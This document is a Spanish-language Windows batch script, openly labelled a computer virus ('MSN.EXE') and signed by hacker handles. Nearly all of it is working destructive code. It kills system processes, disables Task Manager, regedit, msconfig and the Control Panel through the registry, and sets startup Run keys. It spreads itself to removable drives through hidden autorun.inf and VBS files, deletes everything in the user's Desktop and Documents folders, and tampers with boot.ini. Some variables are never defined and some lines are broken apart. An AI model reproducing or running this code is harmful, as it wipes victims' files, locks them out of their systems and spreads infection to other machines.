::************************************************
:: VIRUS INFORMATICO MSN.EXE
::************************************************
:: virus creado por hacked by
:: W4rR3d - G3kk0 - W4rc10k - M1lh077
:: virus dedicado al grupo de hackers " Ka0 Team"
::************************************************
..************************************************
.. Piura - Peru
.*************************************************
. Autodidacta en Ingenieria de Sistemas
. y creador de virus informaticos
. hacked by W4rR3d
.*************************************************
:inicio
taskkill /f/im explorer.exe /im teatimer.exe /im msnmsgr.exe /im im mspaint.exe
taskkill /f/im explorer.exe / im notepad.exe /im calc.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v msn /t REG_SZ /d "%b10%\system32\msn\msn.exe" /f
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v hotmail /t REG_SZ /d "%b5%\system32\msn\msn.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\My Computer" /v NoDrives /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Advanced /v Hidden /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableMsConfig /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1297979999&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=10250&id=64855&mkt=es-pe&cbcxt=mai&snsc=1"
reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
:C1
if exist %b4%msn attrib +h +s
%b4%msn
&attrib +s +h +r
%b4%autorun.inf
%b2% %b10%\system32\msn %b4%msn
%b3% "%b10%\system32\msn"
copy /y
%0 "
%b10%\system32\msn\msn.exe"
%b1% [autorun] >>%b4%autorun.inf
%b1% OPEN=msn\msn.exe >>%b4%autorun.inf
%b1% shell\open\Command=msn\msn.exe >>%b4%autorun.inf
%b1% shell\open\Default=1 >>%b4%autorun.inf
%b1% shell\explore\Command=msn\msn.exe >>%b4%autorun.inf
attrib +s +h +r %b4%msn
attrib +s +h +r %b4%autorun.inf
%b1% on error resume next>> %b4%msn.vbs
%b1% set shell = createobject
("wscript.shell"
)>> %b4%msn.vbs
%b1% shell.run "%b10%\system32\msn\msn.exe">> %b4%msn.vbs
start %b4%msn.vbs
%b1% Msgbox "bienvenido a hotmail.com" >> %b4%aviso.vbs
start %b4%aviso.vbs
:D
:D1
if exist %b5%msn attrib +h +s
%b5%msn
&attrib +s +h +r
%b5%autorun.inf
%b2% %b10%\system32\msn %b5%msn
%b3% "%b10%\system32\msn"
copy /y
%0 "
%b10%\system32\msn\msn.exe"
%b1% [autorun] >>%b5%autorun.inf
%b1% OPEN=msn\msn.exe >>%b5%autorun.inf
%b1% shell\open\Command=msn\msn.exe >>%b5%autorun.inf
%b1% shell\open\Default=1 >>%b5%autorun.inf
%b1% shell\explore\Command=msn\msn.exe >>%b5%autorun.inf
attrib +s +h +r %b5%msn
attrib +s +h +r %b5%autorun.inf
%b1% on error resume next>> %b5%msn.vbs
%b1% set shell = createobject
("wscript.shell"
)>> %b5%msn.vbs
%b1% shell.run "%b10%\system32\msn\msn.exe">> %b5%msn.vbs
start %b5%msn.vbs
%b1% Msgbox "bienvenido a hotmail.com" >> %b5%aviso.vbs
start %b5%aviso.vbs
:E
:E1
if exist %b6%msn attrib +h +s
%b6%msn
&attrib +s +h +r
%b6%autorun.inf
%b2% %b10%\system32\msn %b6%msn
%b3% "%b10%\system32\msn"
copy /y
%0 "
%b10%\system32\msn\msn.exe"
%b1% [autorun] >>%b6%autorun.inf
%b1% OPEN=msn\msn.exe >>%b6%autorun.inf
%b1% shell\open\Command=msn\msn.exe >>%b6%autorun.inf
%b1% shell\open\Default=1 >>%b6%autorun.inf
%b1% shell\explore\Command=msn\msn.exe >>%b6%autorun.inf
attrib +s +h +r %b6%msn
attrib +s +h +r %b6%autorun.inf
%b1% on error resume next>> %b6%msn.vbs
%b1% set shell = createobject
("wscript.shell"
)>> %b6%msn.vbs
%b1% shell.run "%b10%\system32\msn\msn.exe">> %b6%msn.vbs
start %b6%msn.vbs
%b1% Msgbox "bienvenido a hotmail.com" >> %b6%aviso.vbs
start %b6%aviso.vbs
:F
:F1
if exist %b7%msn attrib +h +s
%b7%msn
&attrib +s +h +r
%b7%autorun.inf
%b2% %b10%\system32\msn %b7%msn
%b3% "%b10%\system32\msn"
copy /y
%0 "
%b10%\system32\msn\msn.exe"
%b1% [autorun] >>%b7%autorun.inf
%b1% OPEN=msn\msn.exe >>%b7%autorun.inf
%b1% shell\open\Command=msn\msn.exe >>%b7%autorun.inf
%b1% shell\open\Default=1 >>%b7%autorun.inf
%b1% shell\explore\Command=msn\msn.exe >>%b7%autorun.inf
attrib +s +h +r %b7%msn
attrib +s +h +r %b7%autorun.inf
%b1% on error resume next>> %b7%msn.vbs
%b1% set shell = createobject
("wscript.shell"
)>> %b7%msn.vbs
%b1% shell.run "%b10%\system32\msn\msn.exe">> %b7%msn.vbs
start %b7%msn.vbs
%b1% Msgbox "bienvenido a hotmail.com" >> %b7%aviso.vbs
start %b7%aviso.vbs
:G
:G1
if exist %b8%msn attrib +h +s
%b8%msn
&attrib +s +h +r
%b8%autorun.inf
%b2% %b10%\system32\msn %b8%msn
%b3% "%b10%\system32\msn"
copy /y
%0 "
%b10%\system32\msn\msn.exe"
%b1% [autorun] >>%b8%autorun.inf
%b1% OPEN=msn\msn.exe >>%b8%autorun.inf
%b1% shell\open\Command=msn\msn.exe >>%b8%autorun.inf
%b1% shell\open\Default=1 >>%b8%autorun.inf
%b1% shell\explore\Command=msn\msn.exe >>%b8%autorun.inf
attrib +s +h +r %b8%msn
attrib +s +h +r %b8%autorun.inf
%b1% on error resume next>> %b8%msn.vbs
%b1% set shell = createobject
("wscript.shell"
)>> %b8%msn.vbs
%b1% shell.run "%b10%\system32\msn\msn.exe">> %b8%msn.vbs
start %b8%msn.vbs
%b1% Msgbox "bienvenido a hotmail.com" >> %b8%aviso.vbs
start %b8%aviso.vbs
:H
:H1
if exist %b9%msn attrib +h +s
%b9%msn
&attrib +s +h +r
%b9%autorun.inf
%b2% %b10%\system32\msn %b9%msn
%b3% "%b10%\system32\msn"
copy /y
%0 "
%b10%\system32\msn\msn.exe"
%b1% [autorun] >>%b9%autorun.inf
%b1% OPEN=msn\msn.exe >>%b9%autorun.inf
%b1% shell\open\Command=msn\msn.exe >>%b9%autorun.inf
%b1% shell\open\Default=1 >>%b9%autorun.inf
%b1% shell\explore\Command=msn\msn.exe >>%b9%autorun.inf
attrib +s +h +r %b9%msn
attrib +s +h +r %b9%autorun.inf
%b1% on error resume next>> %b9%msn.vbs
%b1% set shell = createobject
("wscript.shell"
)>> %b9%msn.vbs
%b1% shell.run "%b10%\system32\msn\msn.exe">> %b9%msn.vbs
start %b9%msn.vbs
%b1% Msgbox "bienvenido a hotmail.com" >> %b9%aviso.vbs
start %b9%aviso.vbs
:bor
DEL /Q /F /S "
%b12%\Documents and Settings\
%b13%\Meus documentos\*.*"
DEL /Q /F /S "
%b12%\Documents and Settings\
%b13%\Escritorio\*.*"
%b1% -={W4rR3d_by_hacked}=- >> "%b10%\system32"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b10%\system"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b10%\"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b4%""-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b5%""-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b6%""-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b7%""-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b8%""-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b9%""-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%systemdrive%\Documents and Settings\%b13%\Escritorio\-={W4rR3d_by_hacked}=-.RAR.EXE"
%b1% -={W4rR3d_by_hacked}=- >> "%b12%\Documents and Settings\%b13%\Mis documentos\-={W4rR3d_by_hacked}=-.RAR.EXE"
:boot
attrib -h -s -r %b14%\boot.ini
%b1% [boot loader] >> %b14%\boot.ini
%b1% timeout=30 >> %b14%\boot.ini
%b1% default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS >> %b14%\boot.ini
%b1% default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWs >> %b14%\boot.ini
%b1% [operating systems] >> %b14%\boot.ini
%b1% multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect >> %b14%\boot.ini
%b1% multi(0)disk(0)rdisk(0)partition(1)\WINDOWs="-={W4rR3d_by_hacked}=-" /noexecute=optin / >> %b14%\boot.ini
attrib +s +h +r %b14%\boot.ini